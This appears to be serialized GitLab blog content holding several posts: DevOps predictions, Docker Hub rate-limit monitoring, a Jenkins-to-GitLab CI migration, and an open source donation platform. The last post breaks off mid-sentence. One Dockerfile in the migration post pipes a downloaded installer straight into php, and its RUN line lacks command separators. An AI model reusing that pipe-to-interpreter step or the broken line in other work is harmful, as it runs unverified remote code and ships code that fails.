technologies, but those problems are becoming more understood and we’ll see that gap shorten over time reducing cost and complexities.”\n\n## 2. Businesses will continue to integrate security more tightly into DevOps and create DevSecOps teams to reduce risk, speed deployment, and gain a competitive advantage.\n\n[Johnathan Hunt](https://gitlab.com/JohnathanHunt), Vice President of Security, says:\n\n“The [DevSecOps](/blog/gitlab-is-setting-standard-for-devsecops/) practice will continue to increase in 2022 as more organizations understand the efficiencies and improved security of this strategy. Further, those that are currently leveraging DevSecOps as part of their development practice are realizing the benefits with fewer vulnerabilities, faster deployments, less time spent in corrective actions, and an overall reduction of risk. Ultimately, this will provide companies with a differentiated approach, leading to competitive advantages in their space.\n\nDevSecOps is important to prioritize due to the increased threat landscape that remote work models introduce. It is imperative that companies focus on transformative ways to protect their product and data to effectively manage their overall risk posture. DevSecOps is a proven strategy that reduces risk and security incidents while allowing faster and more secure code deployments.”\n\n## 3. Two of the biggest buzzwords of 2021 will take divergent paths next year: Kubernetes will play a fundamental role in DevSecOps, while zero trust will see only moderate gains.\n\nHunt says:\n\n“DevOps users have come to realize the benefits of operating security controls natively within Kubernetes rather than separate tools and separate teams adding steps to the process. This is a fundamental component to furthering the DevSecOps story. Additionally, the [Kubernetes](/blog/gitlab-kubernetes-agent-on-gitlab-com/) platform is continuing to evolve and adapt to the need for greater control and automation within reach of DevOps users leading to the natural and highly advantageous shift left strategy.\n\nMeantime, although we are seeing an increase in the implementation of certain zero trust principles, overall the industry has been slow to respond. Much of this is due to the understanding, complexity, and difficulty of implementing full zero-trust models within the tech stack. I predict 2022 will, at best, see a moderate gain in the adoption of [zero trust](/blog/questions-regarding-our-zero-trust-efforts/).”\n\n## 4. Secure software supply chain will become a standard element of security strategy for government organizations.\n\n[Bob Stevens](https://gitlab.com/bstevens1), Area Vice President of Public Sector, says:\n\n“Federal agencies are starting to tackle software supply chain security, spurred by guidance from NIST and actions outlined in Executive Orders issued in early 2021. While these guidelines are critical to success, agencies will rise to the challenge of implementing new security measures instead of waiting to act. Regardless of the publication of final guidance, CIOs will implement actions for software supply chain security to proactively defend their agencies. CIOs know that enhancing cyber defenses immediately is crucial to outsmarting adversaries, and they will not delay in enacting change. Once guidelines are final, CIOs will adjust their policies to meet best practices.\n\nTo ensure security in the software supply chain, people, processes, and technologies need to work together in unison. This includes code that has been examined by numerous security personnel, build processes that take place in the open, and high-quality software that is tested and trusted. Software factories and contractors that work with them will also need to put in place a comprehensive and continuously monitored software bill of materials (SBOM), allowing everyone touching the software to fully understand the dependencies and vulnerabilities of their ecosystems.\n\nA DevOps platform can address many important security considerations. With security scanners built into the development process, agencies can scan every line of code as it is committed, allowing developers to identify and remediate vulnerabilities before they are pushed.“\n\n## 5. Cloud adoption will extend to other parts of the development life cycle, including developers’ own environments. \n\n[Brendan O’Leary](https://gitlab.com/brendan), Staff Developer Evangelist, says:\n\n“I still see a lot of enterprises or individual teams that find themselves at [various phases of DevOps](/blog/welcome-to-the-devops-platform-era/). So I believe that 2022 will bring a shift towards platforms - either through DIY or adoption of a DevOps platform. We’ll see more adoption of cloud technologies for other parts of the development lifecycle as well, such as developers’ own environments.”\n\n## 6. Open source will grow beyond a common software development practice to a full business model embraced by organizations.\n\n[Cesar Saavedra](https://gitlab.com/csaavedra1), Technical Marketing Manager, says:\n\n“Open source growth will continue in the future, and not just as a way to develop software but also as a business model. Not only have companies realized the need to be [digital leaders](https://www.capgemini.com/wp-content/uploads/2017/07/The_Digital_Advantage__How_Digital_Leaders_Outperform_their_Peers_in_Every_Industry.pdf) to be successful in the market, but also large commercial vendors are becoming open source and switching to this business model to stay competitive and open-source startups have caught [the interest of investors](https://techcrunch.com/2021/06/26/2170552/). Open source is taking over the software market. In fact, the Open Source Services Market is [predicted to grow](https://www.businesswire.com/news/home/20201113005374/en/66.84-Billion-Open-Source-Services-Market-by-Industry-Service-Type-and-Geography---Global-Forecast-to-2026---ResearchAndMarkets.com) at a CAGR of ~21.75% with a value expected to reach $66.84 billion by 2026. Another proof point of this growth is that [recent surveys show](https://www.datadoghq.com/container-report/#10) that the most popular container images are all based on open source software, which indicates this growing adoption trend of open source.\n\nAdopting open source into your business model is a complex decision and process. If you’re a successful company with a proprietary software product, it’s just a matter of time before a competitor with an open source offering will appear in your market segment. In this case, you will most likely need to switch your business model to one suited for open source software. For example, you will need to switch from license+subscription revenues to just subscription. Another big decision to make is whether or not to open source your software. Many software products that started as proprietary software converted to open source licensing, e.g. Adobe Flex, Visual Studio Code, .NET framework, PowerShell, Solaris. Open sourcing your software product usually goes hand-in-hand with adopting an open source business model of subscription-based revenues.\n\nYou also will need to contribute back to the open source community by making your enhancements and fixes to your product available in your open source project. In fact, to be successful in the open source market, you have to commit resources to help develop open source projects.”\n\n## 7. The open source community will grow significantly as a result of the acceleration of digital-first and cloud-native companies.\n\nSaavedra says: \n\n“The cloud helped accelerate the adoption of open source software because it allowed companies to scale up without incurring large costs in software licensing (open source subscription models are less expensive than proprietary software). Furthermore, open source software fosters collaboration among the brightest minds no matter where around the globe they reside, bringing together the power of the community and benefiting developers, organizations, and vendors alike. As a result, developers and organizations continue to adopt and contribute to open source projects due to a low entry barrier, accessibility, and cost. The Covid-19 pandemic [accelerated this adoption even more](https://venturebeat.com/2021/01/26/how-the-pandemic-is-accelerating-enterprise-open-source-adoption/) due to the switch to remote work by organizations that now have access to a new set of developer talent well versed in open source. The acceleration of digital-first and cloud-native companies will increase the use of open source, which will, in turn, demand more and more open source developers. The result will be an increase in the size of the open source community worldwide.”\n\n## 8. All-remote will become a prevailing work environment as a means to attract and retain talent.\n\nDarren Murph, Head of Remote, says:\n\n“All-remote and all-colocated will become the prevailing environments. Hybrid-remote will be broadly tested but will be rife with friction and dysfunction due to a lack of understanding in its implementation. The terminology also will evolve. For some organizations, hybrid will end up meaning ‘remote-first with an office for special events,’ while those who attempt to force knowledge workers into a more rigid in-office schedule will struggle to retain employees. \n\nDedicated leadership surrounding remote transitions and overall future-of-work strategy will increase in 2022. What GitLab pioneered has served as [a blueprint for organizations](/company/culture/all-remote/head-of-remote/) like Facebook, Dropbox, Okta, LinkedIn, VMWare, and other tech firms. Next year, industries beyond tech will begin to embrace remote work and create awareness for the intrinsic link between organizational design and talent brand. Organizations that rigidly force knowledge workers back into the office will see above-average attrition rates. With two years of remote work habits being ingrained, top talent will demand continued flexibility. Many organizations that have resisted investing in creating excellent remote work infrastructure will be forced to do so to compete with more flexible rivals. \n\nA well-built remote work plan will be seen as a hedge against future crises. Just as organizations are currently expected to have succession and security plans, having a remote work strategy will be critical to business continuity. Organizations will also need to work hard to establish psychological safety. As people resume social gatherings, employers have an opportunity to lean into the culture that is built outside of work and create strategies for that to be shared within the workplace.”",[685,865,9],{"slug":1783,"featured":6,"template":689},"devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more","content:en-us:blog:devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more.yml","Devops Predictions Gitlab Experts Weigh In On Ai Security Remote Work And More","en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more.yml","en-us/blog/devops-predictions-gitlab-experts-weigh-in-on-ai-security-remote-work-and-more",{"_path":1789,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1790,"content":1796,"config":1803,"_id":1805,"_type":14,"title":1806,"_source":16,"_file":1807,"_stem":1808,"_extension":19},"/en-us/blog/docker-hub-rate-limit-monitoring",{"title":1791,"description":1792,"ogTitle":1791,"ogDescription":1792,"noIndex":6,"ogImage":1793,"ogUrl":1794,"ogSiteName":673,"ogType":674,"canonicalUrls":1794,"schema":1795},"How to make Docker Hub rate limit monitoring a breeze","Docker Hub Rate Limits are enforced and we need to find ways to monitor the remaining pull requests. Explore some ways to create a monitoring plugin for Nagios/Icinga/Sensu/Zabbix and test-drive a new Prometheus exporter in combination with Grafana.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681749/Blog/Hero%20Images/vidarnm-unsplash.jpg","https://about.gitlab.com/blog/docker-hub-rate-limit-monitoring","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to make Docker Hub rate limit monitoring a breeze\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Friedrich\"}],\n        \"datePublished\": \"2020-11-18\",\n      }",{"title":1791,"description":1792,"authors":1797,"heroImage":1793,"date":1799,"body":1800,"category":801,"tags":1801},[1798],"Michael Friedrich","2020-11-18","\n\nWhen we learned about the [Docker Hub Rate Limit](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/), we thought about ways to mitigate and analyse the new situation. Container images are widely used and adopted for sandbox environments in [CI/CD pipelines](/solutions/continuous-integration/) and cloud-native production environments with app deployment in [Kubernetes clusters](/solutions/kubernetes/).\n\n## What is meant by Docker Hub limits?\n\nEach `docker pull` request toward the central `hub.docker.com` container registry is being counted. When a defined limit is reached, future requests are blocked and might be delayed into the next free window. [CI/CD](/topics/ci-cd/) jobs cannot be executed anymore after receiving a HTTP error `429 - too many requests` and similar errors will be seen in production deployment logs for Kubernetes.\n\nDocker defines this limit with 100 anonymous requests every six hours for the client's source IP address. If you have multiple container deployments behind an IP address, for example a company DMZ using a NAT, this limit can be reached very fast. A similar problem happens with watchtower tools which try to keep your container images updated, for example on your self-managed GitLab Runner. The limit can be raised by logging in, and by getting a paid subscription.\n\nThe question is: Where can you see the current limit and the remaining pull requests?\n\n### How to check the Docker Hub request limit?\n\nThe [Docker documentation](https://docs.docker.com/docker-hub/download-rate-limit/#how-can-i-check-my-current-rate) suggests to use CLI commands which invoke `curl` HTTP requests against the Docker Hub registry and parse the JSON response with [jq](https://stedolan.github.io/jq/).\n\nDefine the `IMAGE` variable once for the following CLI commands to use:\n\n```shell\n$ IMAGE=\"ratelimitpreview/test\"\n```\n\nObtain a token for authorization. Optionally print the variable value to verify its content.\n\n```shell\n$ TOKEN=$(curl \"https://auth.docker.io/token?service=registry.docker.io&scope=repository:$IMAGE:pull\" | jq -r .token)\n\n$ echo $TOKEN\n```\n\nThe next step is to simulate a `docker pull` request. Instead of using `GET` as HTTP request method, a `HEAD` request is sent which does not count toward the rate limit. The response headers contain the keys `RateLimit-Limit` and `RateLimit-Remaining`.\n\n```shell\n$ curl --head -H \"Authorization: Bearer $TOKEN\" https://registry-1.docker.io/v2/$IMAGE/manifests/latest\n```\n\nThe limit in the example is `2500` with remaining `2495` pull requests. `21600` defines the limit time window as six hours.\n\n```\nRateLimit-Limit: 2500;w=21600\nRateLimit-Remaining: 2495;w=21600\n```\n\n`RateLimit-Reset` can be returned too, this will be the remaining time until the limits are reset.\n\n### Create a monitoring script\n\nThe CLI commands can be turned into a programming language of your choice which provides methods for HTTP requests and better response parsing. The algorithm needs to follow these steps:\n\n* Obtain an authorization token from Docker Hub. Username/password credentials can be optionally provided, otherwise the request happens anonymously.\n* Send a `HEAD` request to the Docker Hub registry and simulate a `docker pull` request\n* Parse the response headers and extract the values for `RateLimit-Limit` and `RateLimit-Remaining`\n* Print a summary of the received values\n\nA plugin script which can be used by Nagios/Icinga/Sensu/Zabbix and others has additional requirements. It needs to implement the [Monitoring Plugins API specification](https://www.monitoring-plugins.org/doc/guidelines.html):\n\n* Print the limit and remaining count\n* Calculate a state: Ok, Warning, Critical, Unknown and print a helpful text on the shell\n* Add optional warning/critical thresholds for the remaining count. Whenever the count is lower than the threshold, the state changes to Warning/Critical and the exit code changes: `OK=0, Warning=1, Critical=2, Unknown=3`\n* Collect limit values as performance metrics for graphing and visualization\n* Add verbose mode and timeout parameters as plugin development best practices. If Docker Hub does not respond within 10 seconds as default, the plugin exits and returns `Unknown` as state.\n\nYou can download the [check_docker_hub_limit.py plugin script](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit) and integrate it into your monitoring environment.\n\n#### Use the monitoring plugin script\n\nThe [check_docker_hub_limit.py plugin script](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit) plugin is written in Python 3 and requires the `requests` library. Follow the [installation instructions](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit#installation) and run the plugin script with the `--help` parameter to see all available options:\n\n```\n$ python check_docker_hub_limit.py --help\n\nusage: check_docker_hub_limit.py [-h] [-w WARNING] [-c CRITICAL] [-v] [-t TIMEOUT]\n\nVersion: 2.0.0\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -w WARNING, --warning WARNING\n                        warning threshold for remaining\n  -c CRITICAL, --critical CRITICAL\n                        critical threshold for remaining\n  -v, --verbose         increase output verbosity\n  -t TIMEOUT, --timeout TIMEOUT\n                        Timeout in seconds (default 10s)\n```\n\nRun the script to fetch the current remaining count. The plugin script exit code returns `0` being OK.\n\n```\n$ python3 check_docker_hub_limit.py\nOK - Docker Hub: Limit is 5000 remaining 4997|'limit'=5000 'remaining'=4997\n\n$ echo $?\n0\n```\n\nSpecify the warning threshold with `10000` pulls, and the critical threshold with `3000`.\nThe example shows how the state changes to `WARNING` with a current count of `4999` remaining\npull requests. The plugin script exit code changes to `1`.\n\n```\n$ python3 check_docker_hub_limit.py -w 10000 -c 3000\nWARNING - Docker Hub: Limit is 5000 remaining 4999|'limit'=5000 'remaining'=4999\n\n$ echo $?\n1\n```\n\nSpecify a higher critical threshold with `5000`. When the remaining count goes below this value,\nthe plugin script returns `CRITICAL` and changes the exit state into `2`.\n\n```\n$ python3 check_docker_hub_limit.py -w 10000 -c 5000\nCRITICAL - Docker Hub: Limit is 5000 remaining 4998|'limit'=5000 'remaining'=4998\n\n$ echo $?\n2\n```\n\nWhen a timeout is reached, or another error is thrown, the exit state switches to `3` and the output state becomes `UNKNOWN`.\n\n### Use a Prometheus exporter for rate limit metrics\n\n[Prometheus](https://prometheus.io/) scrapes metrics from HTTP endpoints. There is a variety of exporters for Prometheus to monitor host systems, HTTP endpoints, containers, databases, etc. Prometheus provides [client libraries](https://prometheus.io/docs/instrumenting/clientlibs/) to make it easier to start writing your own custom exporter. The metrics need to be exported in a [defined format](https://prometheus.io/docs/instrumenting/exposition_formats/).\n\nThe Docker Hub limit values can be fetched with obtaining an authorization token first, and then sending a `HEAD` request shown above. The code algorithm follows the ideas of the monitoring plugin. Instead of printing the values onto the shell, the metric values are exposed with an HTTP server. The Prometheus client libraries provide this functionality built-in.\n\nWe have created a [Prometheus Exporter for Docker Hub Rate Limits](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/docker-hub-limit-exporter) using the [Python client library](https://github.com/prometheus/client_python). The repository provides a demo environment with `docker-compose` which starts the exporter, Prometheus and Grafana.\n\nEnsure that [docker-compose is installed](https://docs.docker.com/compose/install/) and clone/download the repository. Then run the following commands:\n\n```\n$ cd example/docker-compose\n\n$ docker-compose up -d\n```\n\nNavigate to `http://localhost:3030` to access Grafana and explore the demo environment with the pre-built dashboard.\n\n![Grafana dashboard for Docker Hub Limit Prometheus Exporter](https://about.gitlab.com/images/blogimages/docker-hub-limit-monitoring/grafana_prometheus_docker_hub_limit_exporter_demo.png){: .shadow.medium.center}\n\nGrafana dashboard for Docker Hub Limits\n{: .note.text-center}\n\n### More monitoring/observability ideas\n\nUse the steps explained in this blog post to add Docker Hub limit monitoring. Evaluate the Prometheus exporter or the check plugin, or create your own monitoring scripts. Fork the repositories and send a MR our way!\n\n* [check-docker-hub-limit for Nagios/Icinga/Zabbix/Sensu](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/check-docker-hub-limit)\n* [docker-hub-limit-exporter for Prometheus](https://gitlab.com/gitlab-com/marketing/corporate_marketing/developer-evangelism/code/docker-hub-limit-exporter)\n\nThe Prometheus exporter and the monitoring plugin script can help to see trends and calculate usage over time. Use your own local (GitLab) container registry or one of the available caching methods described in these blog posts:\n\n* [Cache Docker images in your CI/CD infrastructure](/blog/mitigating-the-impact-of-docker-hub-pull-requests-limits/). Use this resource for possible solutions around caching and proxying.\n* [Use the Dependency Proxy](/blog/minor-breaking-change-dependency-proxy/). Learn more about the GitLab Dependency Proxy being made open source in the future.\n* [#everyonecancontribute cafe: Docker Hub Rate Limit: Mitigation, Caching and Monitoring](https://everyonecancontribute.com/post/2020-11-04-cafe-7-docker-hub-rate-limit-monitoring/). This is a community meetup hosted by Developer Evangelists at GitLab. The blog post includes a video with more insights and discussion.\n\nPhoto by [Vidar Nordli-Mathisen](https://unsplash.com/@vidarnm) from [Unsplash](https://www.unsplash.com).\n{: .note}\n",[845,685,1038,9,1802],"production",{"slug":1804,"featured":6,"template":689},"docker-hub-rate-limit-monitoring","content:en-us:blog:docker-hub-rate-limit-monitoring.yml","Docker Hub Rate Limit Monitoring","en-us/blog/docker-hub-rate-limit-monitoring.yml","en-us/blog/docker-hub-rate-limit-monitoring",{"_path":1810,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1811,"content":1817,"config":1823,"_id":1825,"_type":14,"title":1826,"_source":16,"_file":1827,"_stem":1828,"_extension":19},"/en-us/blog/docker-my-precious",{"title":1812,"description":1813,"ogTitle":1812,"ogDescription":1813,"noIndex":6,"ogImage":1814,"ogUrl":1815,"ogSiteName":673,"ogType":674,"canonicalUrls":1815,"schema":1816},"Continuous integration: From Jenkins to GitLab using Docker","We're migrating all of our working tools to open source ones, and moving to GitLab has made all the difference.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667509/Blog/Hero%20Images/continuous-integration-from-jenkins-to-gitlab-using-docker.jpg","https://about.gitlab.com/blog/docker-my-precious","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Continuous integration: From Jenkins to GitLab using Docker\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Abdulkader Benchi\"}],\n        \"datePublished\": \"2017-07-27\",\n      }",{"title":1812,"description":1813,"authors":1818,"heroImage":1814,"date":1820,"body":1821,"category":10,"tags":1822},[1819],"Abdulkader Benchi","2017-07-27","\n\n Here at [Linagora](https://linagora.com/), we are migrating all our working tools to open source ones. Yes, we are an open source company with open source lovers.\n\n\u003C!-- more -->\n\nAmong these different tools were the [Atlassian](https://www.atlassian.com/) development tools. We decided to switch to GitLab and it started making all the difference. Indeed, GitLab includes Git repository management, issue tracking, code review, an IDE, activity streams, wikis, and more. It's worth mentioning that GitLab has built-in [Continuous Integration (CI) and Continuous Deployment (CD)](/topics/ci-cd/) to test, build, and deploy our code. We can easily monitor the progress of our tests and build pipelines. What we love about the CI provided by GitLab is the fact that it supports Docker. Indeed, GitLab allows us to use custom [Docker](https://www.docker.com/) images, spin up services as part of testing, build new Docker images, even run on [Kubernetes](https://kubernetes.io/).\n\nIf you are a Docker lover and you want to see how to transform [Jenkins](https://jenkins.io/) CI to GitLab CI using Docker, then you are in the right place.\n\n### Jenkins job\n\nLet’s have a look at our Jenkins Job.\n\n```\nMONGOPORT=23500\nBASEDIR=`pwd`\n\n# Update tools\n(cd repo && composer update)\n\n# Run code style checker\n./repo/vendor/bin/phpcs -p --standard=repo/vendor/sabre/dav/tests/phpcs/ruleset.xml --report-checkstyle=checkstyle.xml repo/lib/\n\n# Cleanup\nrm -rf mongodb\nrm -f mongo.pid\nrm -f mongo.log\nmkdir -p mongodb\n\n\n# Start temporary mongo server\nmongod --dbpath mongodb \\\n       --port $MONGOPORT \\\n       --pidfilepath $BASEDIR/mongo.pid \\\n       --logpath mongo.log \\\n        --fork\n\nsleep 2\n\n# Configure\ncat \u003C\u003CEOF > repo/config.json\n{\n  \"webserver\": {\n    \"baseUri\": \"/\",\n    \"allowOrigin\": \"*\"\n  },\n  \"database\": {\n    \"esn\": {\n      \"connectionString\" : \"mongodb://localhost:$MONGOPORT/\",\n      \"db\": \"esn\",\n      \"connectionOptions\": {\n        \"w\": 1,\n        \"fsync\": true,\n        \"connectTimeoutMS\": 10000\n      }\n    },\n    \"sabre\": {\n      \"connectionString\" : \"mongodb://localhost:$MONGOPORT/\",\n      \"db\": \"sabredav\",\n      \"connectionOptions\": {\n        \"w\": 1,\n        \"fsync\": true,\n        \"connectTimeoutMS\": 10000\n      }\n    }\n  },\n  \"esn\": {\n    \"apiRoot\": \"http://localhost:8080/api\"\n  }\n}\nEOF\n\n# Run unit tests\n(cd repo/tests && ../vendor/bin/phpunit \\\n    --coverage-clover=$BASEDIR/clover.xml \\\n    --log-junit=$BASEDIR/junit.xml \\\n    .)\n\n# Clean up\nkill `cat mongo.pid`\n```\n\nI know, it is horrible to read this configuration, but you know we have to configure everything from A to Z in Jenkins. I can confirm that this job is one of the simplest jobs we have, because it depends on only one external service, “MongoDB.” We passed almost half of this job configuring this external service, starting it, cleaning it and killing it. Whereas, our main job is only about 10 lines. Furthermore, we suppose that on the Jenkins machine, we already have installed PHP, all PHP plugins and composer. So if we change the machine we have to reconfigure the new machine before starting using it. Docker… help please.\n\n![Docker help us](https://about.gitlab.com/images/blogimages/sos-docker.jpg){: .shadow}\u003Cbr>\n\n### GitLab job\n\nBefore starting, it's worth mentioning that good documentation about this part is presented [here](https://docs.gitlab.com/ee/ci/docker/using_docker_images.html). If you got it right, all GitLab’s CI configuration is to be done in a file called .gitlab-ci.yml. I will start presenting the final result before discussing the details:\n\n```\nimage: linagora/php-deps-composer:5.6.30\n\nservices:\n  - mongo:3.2\n\nstages:\n  - build\n  - deploy_dev\n\nbuild:\n  stage: build\n  script:\n    - composer up\n    - cp config.tests.json config.json\n    - ./vendor/bin/phpcs -p --standard=vendor/sabre/dav/tests/phpcs/ruleset.xml --report-checkstyle=checkstyle.xml lib/\n    - cd tests\n    - ../vendor/bin/phpunit --coverage-clover=${CI_PROJECT_DIR}/clover.xml --log-junit=${CI_PROJECT_DIR}/junit.xml .\n\ndeploy_dev:\n  stage: deploy_dev\n  only:\n    - master\n  script:\n    - cd /srv/sabre.dev\n    - git fetch --all\n    - git checkout ${CI_COMMIT_SHA}\n    - composer up\n```\n\n### Migration procedure\n\nWe start defining the image of which of GitLab’s Docker executors will run to perform the CI tasks. This is done by using the image keyword (line 1). This is a custom image we build to provide all the dependencies we need for our CI tasks. Here is the corresponding Dockerfile:\n\n```\nFROM php:5.6.30\n\nMAINTAINER Linagora Folks \u003Clgs-openpaas-dev@linagora.com>\n\nRUN apt-get update \\\n    apt-get -y install unzip git php5-curl php5-dev php-amqplib \\\n    docker-php-ext-install bcmath \\\n    pecl install mongo \\\n    docker-php-ext-enable mongo \\\n    curl https://getcomposer.org/installer | php \\\n    mv composer.phar /usr/local/bin/composer.phar \\\n    ln -s /usr/local/bin/composer.phar /usr/local/bin/composer\n```\n\nAs I mentioned before, our CI requires an external MongoDB service. But this time, Docker is here to do the magic. It helps us with configuring, starting and killing the service correctly. All what we have to do is to declare mongo as a service (line 4), et voilà!\n\nNow we have set up our environment, we can leverage script tag to test our code (lines 13–17) and deploy it (lines 24–27). It is worth noting that config.test.json contains all the configuration we have had in Jenkins (Lines 28–56 from Jenkins configuration).\n\n#### Running the GitLab job locally\n\nWe can easily test our GitLab builds locally using [GitLab Runner](https://gitlab.com/gitlab-org/gitlab-runner/blob/master/docs/commands/README.md). Here is the procedure:\n\n* Install it locally, either using a package repository or directly from here. If you do not want to install the GitLab Runner locally, you can always leverage Docker to do so. Have a look [here](https://gitlab.com/gitlab-org/gitlab-runner/issues/312).\n* Run the build: gitlab-runner exec docker {my-job}. Whereas, my-job is the name of the job defined in .gitlab-ci.yml. In our case, it is called build.\n\n#### Wrap up\n\nAs you can see, our CI job becomes easier to read thanks to GitLab and Docker. Along the same lines, we do not need to configure our machine to run tests anymore. Docker has got our back. In my opinion, the most important advantage of using Docker to run tests is to guarantee that our tests are always being run in the same conditions each time. These tests are totally isolated (and also independent) from the machine on which they run.\n\nThis post originally appeared on _[Medium](https://medium.com/linagora-engineering/docker-my-precious-6efbce900dcb)_.\n\n### About the Guest Author\n\nAbdulkader Benchi is the Javascript team leader at [Linagora](https://linagora.com/careers).\n",[9,1036],{"slug":1824,"featured":6,"template":689},"docker-my-precious","content:en-us:blog:docker-my-precious.yml","Docker My Precious","en-us/blog/docker-my-precious.yml","en-us/blog/docker-my-precious",{"_path":1830,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1831,"content":1837,"config":1844,"_id":1846,"_type":14,"title":1847,"_source":16,"_file":1848,"_stem":1849,"_extension":19},"/en-us/blog/donatinator-open-source-donation-platform",{"title":1832,"description":1833,"ogTitle":1832,"ogDescription":1833,"noIndex":6,"ogImage":1834,"ogUrl":1835,"ogSiteName":673,"ogType":674,"canonicalUrls":1835,"schema":1836},"The Donatinator: Simple donation solution for charities","This guest author shares his passion project: a free and open source solution for small charities and non-profits to accept donations online.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679940/Blog/Hero%20Images/donatinator-open-source.jpg","https://about.gitlab.com/blog/donatinator-open-source-donation-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Donatinator: A simple, secure way to accept donations to your charity or non-profit\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andrew Chilton\"}],\n        \"datePublished\": \"2019-02-06\",\n      }",{"title":1838,"description":1833,"authors":1839,"heroImage":1834,"date":1841,"body":1842,"category":10,"tags":1843},"The Donatinator: A simple, secure way to accept donations to your charity or non-profit",[1840],"Andrew Chilton","2019-02-06","\n\nMany small non-profits or charity organizations all over the world find it really difficult to accept one-off donations or set up monthly subscriptions online. I know this from firsthand experience.\n\nLast year my wife came to me asking how the organization she volunteers at – a mothers’ support group – could accept donations on their website. My first thought was that the (free) hosting provider they were using would have a feature to do that, but no, not unless you pay, and for a small charity even $10 or $20 per month is too expensive.\n\nMy second thought was to investigate hosting or donation portals. Here's where the journey started.\n\n## Donation platforms offer a mixed bag\n\nAfter looking at various donation platforms, we realised that many differences exist and that you can't always have it all. Some of them:\n\n* Are only http unless you pay up front.\n* Support single donations OR subscriptions, but not both.\n* Are based around a fundraising model (to attain a target amount) but don't support ongoing payments.\n* Are US only, but since we're in New Zealand we needed something that would work here.\n* Provide an iframe payment page but not all.\n* Have a free tier but others required payment from day 1.\n* Don't have a team plan such that members of the charity committee can log in and administer the portal.\n\n## Looking for an open source solution\n\nI kept thinking to myself that there must be an open source project out there already that could do all of this for free. Small charities and non-profits don't have the ability to pay for things up front, especially when it's not part of their core mission. After a while reading, reviewing, comparing, and planning, my non-negotiable for the platform became that \"We didn't have to pay more than necessary.\"\n\nThe only fee we wouldn't be able to get around was credit card processing. Added that we would only pay a percentage fee once we receive a donation rather than up front was also a good result.\n\nBeing a coder and being unimpressed with the status quo, I started coding. Within a month [The Donatinator](http://donatinator.org/) ([demo](https://donatinator.herokuapp.com/), [code](https://gitlab.com/donatinator/)) was born.\n\n## The Donatinator\n\nShortly after launch, The Donatinator can already accept one-off or recurring donations, add and edit simple Markdown pages, and allow multiple team members to log in for administration and basic reporting.\n\nMore features are planned, but the most important thing about the project is that it should be guided by a few founding principles. These are (far from perfect, but a good start):\n\n- The software should be open source so it is free for the end user, for now and always.\n- A basic installation should run within the free tier of various hosting providers.\n- The user should only have to pay for credit card processing fees (but if we can get around this one day we will!) 😃\n\n## Why open source?\n\nAllowing anyone and everyone to use, download, install, change, contribute, and enjoy The Donatinator is paramount to enabling every organisation anywhere to accept donations and allow them to continue the great work they are doing and the help they are providing.\n\n### Why GitLab?\n\nSince we ourselves are open source, choosing a code-hosting provider that is also open source aligns with our values nicely. \u003Cplug> GitLab is the natural home of projects like us and we're very grateful of their hospitality (as well as their 2,000 CI pipeline minutes per month!). \u003C/plug>\n\nFunnily enough this also brought home the idea that it's not actually just the technology that is the interesting part of the project. GitLab's handbook has a great page on values but a very small part of that is the idea of [boring solutions](https://handbook.gitlab.com/handbook/values/#efficiency) which we're also using to guide our technology decisions, keeping things simple and lite.\n\n### A word on pragmatism\n\nEven though we'd love everything to be open source, we know we can't have everything. With that we'd like to thank the following companies that we're currently using to make The Donatinator fulfill its aim. With free plans on Heroku, Google, Glitch, Zeit, MailGun, and others, we should be able to achieve these goals for charities who may only receive a few donations each month, which can make all the difference between helping people or closing down completely due to insufficient funds. Also thanks to Stripe for having a discounted fee for registered charities to maximize each and every donation.\n\nWhich leads me to a confession ...\n\n## A high high, and a low low\n\nStarting a new project is always exciting. Tap tap, code, test, commit, one late night after another. But then the bad news came ...\n\nThe small charity all of this work was initially done for decided to use an existing donor platform. I can understand why, but rather than dwelling on it, I decided to continue working on The Donatinator anyway. I'm still convinced there is a place for it in the world and a variety of people and organisations can benefit from it, if only they knew about it.\n\n## Asking for help, contributions, and donations\n\nWithout shame I am now asking you all for help. The Donatinator is a new project and there is still lots to do, however there are three main areas in which help would be awesome and greatly appreciated!\n\n### Please contribute!\n\nFirstly, contributions of [code](https://gitlab.com/donatinator/donatinator/) and [documentation](https://gitlab.com/donatinator/docs/) are welcome and very important. Participating in the [community](https://spectrum.chat/donatinator) also helps a project thrive and we'd love to chat to you about your needs and requirements.\n\n### Please donate!\n\nSecondly, I'm looking for [patrons and sponsorship](https://donate.donatinator.org/) (yes, it's self hosted) to be able to take the project forward faster. Sustainable open source is still a panacea but I believe it can happen. I don't believe that the charities and non-profits who use The Donatinator should have to pay for the use of it but that means we need to look elsewhere to help with sustainability.\n\n### Please spread the word!\n\nAnd finally but most importantly – users! If there are no users, then there is no project.\n\nIf you know a person, a non-profit, or a charity who could use [The Donatinator](http://donatinator.org/), please get in touch with them. Many are run by non-technical volunteers and they would love to have your help in setting up online donations. Get in touch with us too, for help or if you have any questions – we'd love to hear about your progress and your feedback would be invaluable!\n\n(You could also run The Donatinator yourself for your own open source project or for your own patron portal. Hint hint! 😃)\n\nThere is lots of functionality penciled in for future Donatinator releases but there is nothing like having real users provide ideas or ask for specific features. This is a terrific 